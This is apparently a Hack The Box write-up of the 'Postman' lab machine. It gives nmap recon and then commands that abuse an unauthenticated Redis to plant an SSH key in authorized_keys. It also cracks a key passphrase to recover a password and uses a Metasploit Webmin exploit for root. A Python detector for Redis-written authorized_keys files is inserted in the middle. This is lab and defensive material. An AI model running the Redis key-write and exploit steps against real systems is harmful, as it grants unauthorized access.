Let’s get started!

Level: medium

Reconnaissance

This is the initial step: scan the machine for open services and their versions.

COMMAND: nmap -sC -sV -oN postman 10.10.10.160

PORT      STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

User

Following the indications in Pentesting Redis of the book HackTricks, I tried to connect to Redis
without credentials (and it worked!) and extracted some information from the service.
The most interesting piece of information was the path of the .ssh folder of the user redis inside
the box:

COMMAND: redis-cli -h 10.10.10.160

After going through all of it, I found the path to the .ssh folder.

Knowing this path and following the indications in Pentesting Redis of the book HackTricks, I
created a new ssh key, uploaded the public key to the authorized_keys file and logged in via
ssh as the redis user:

Generate an ssh key pair with ssh-keygen.

COMMAND: ssh-keygen

COMMAND: (echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > foo.txt

Adding 2 blank lines before and after the public key ensures that it is parsed correctly.

COMMAND: cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit

OK

redis-cli -h 10.10.10.160

10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> quit

Let’s connect to ssh.
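As an added defender-side check (not part of the original writeup): the file that the CONFIG SET / SAVE sequence above leaves in .ssh is really an RDB dump with the public key padded by blank lines, and sshd simply skips the lines it cannot parse, so a quick glance at authorized_keys can miss it. The script below parses each entry the way sshd does (optional options, key type, base64 blob whose decoded prefix must repeat the key type) and flags the RDB magic plus every line that is not a valid entry; the key material and RDB bytes are constructed samples, not real data.

```python
import base64
import binascii

# OpenSSH key types accepted in authorized_keys (common subset; extend for your fleet)
KEY_TYPES = {
    b"ssh-rsa", b"ssh-ed25519", b"ssh-dss",
    b"ecdsa-sha2-nistp256", b"ecdsa-sha2-nistp384", b"ecdsa-sha2-nistp521",
}

def parse_entry(line: bytes):
    """Return (key_type, blob) for a well-formed entry, else None (quoted options with spaces unsupported)."""
    fields = line.split()
    for idx in (0, 1):  # key type is field 0, or field 1 when options precede it
        if len(fields) > idx + 1 and fields[idx] in KEY_TYPES:
            try:
                blob = base64.b64decode(fields[idx + 1], validate=True)
            except (binascii.Error, ValueError):
                return None
            # the decoded blob starts with a uint32-length-prefixed copy of the key type
            n = int.from_bytes(blob[:4], "big")
            if len(blob) > 4 and blob[4:4 + n] == fields[idx]:
                return fields[idx].decode(), blob
            return None
    return None

def audit_authorized_keys(data: bytes) -> list:
    """Findings for anything sshd would silently skip; a hand-maintained file yields []."""
    findings = []
    if data.startswith(b"REDIS"):
        findings.append("RDB magic at offset 0: file was written by a Redis SAVE")
    for lineno, raw in enumerate(data.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue  # blank lines and comments are legitimate
        if parse_entry(line) is None:
            findings.append(f"line {lineno}: not a valid public-key entry ({line[:20]!r})")
    return findings

def fake_pubkey() -> bytes:
    # constructed, not a real key: wire format is length-prefixed type, then key material
    blob = b"\x00\x00\x00\x0bssh-ed25519" + b"\x00\x00\x00\x20" + b"\x11" * 32
    return b"ssh-ed25519 " + base64.b64encode(blob) + b" analyst@workstation"

# constructed samples: a clean file, and an approximation of what CONFIG SET dir /
# dbfilename + SAVE leaves behind (RDB header, newline-padded value, RDB trailer)
CLEAN = b"# managed by config management\n" + fake_pubkey() + b"\n"
REDIS_DUMPED = (b"REDIS0008\xfa\tredis-ver\x054.0.9\xfe\x00\xfb\x01\x00\x00\x07crackit"
                + b"\n\n" + fake_pubkey() + b"\n\n" + b"\xff\x00\x11\x22\x33\x44\x55\x66\x77")
```

Run it over real files with `audit_authorized_keys(open(path, "rb").read())` for every user's authorized_keys; the root cause is still an unauthenticated Redis reachable over the network (requirepass, bind and protected-mode in redis.conf), so this audit only finds what was already planted.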

Then, once inside the machine, I enumerated it using the linpeas script from the PEAS suite.
This script found one interesting file:

It turns out that this could be the private ssh key of the user Matt.

After downloading it, extracting the hash from the key in john format and cracking it, you
find that the password used to encrypt the key is computer2008.

But if you try to log in to Matt's account via ssh using the extracted ssh key with that
password, you won't be able to. This is because it is not Matt's current private ssh key.
However, computer2008 is Matt's password, so you can su to Matt.

Root

If you try to log in to the https://Postman:10000 service using the discovered
credentials (Matt : computer2008) you will see that they work!
Then, knowing some valid credentials and knowing the version of the running software,

we can exploit a well known vulnerability of this version of the service:
https://www.exploit-db.com/exploits/46984
So just exploit it using the metasploit module. To do so, set the password, username,
rhosts, and ssl (to true).

If you like my writeup, give me Respect on my HTB profile: Exp1o1t9r
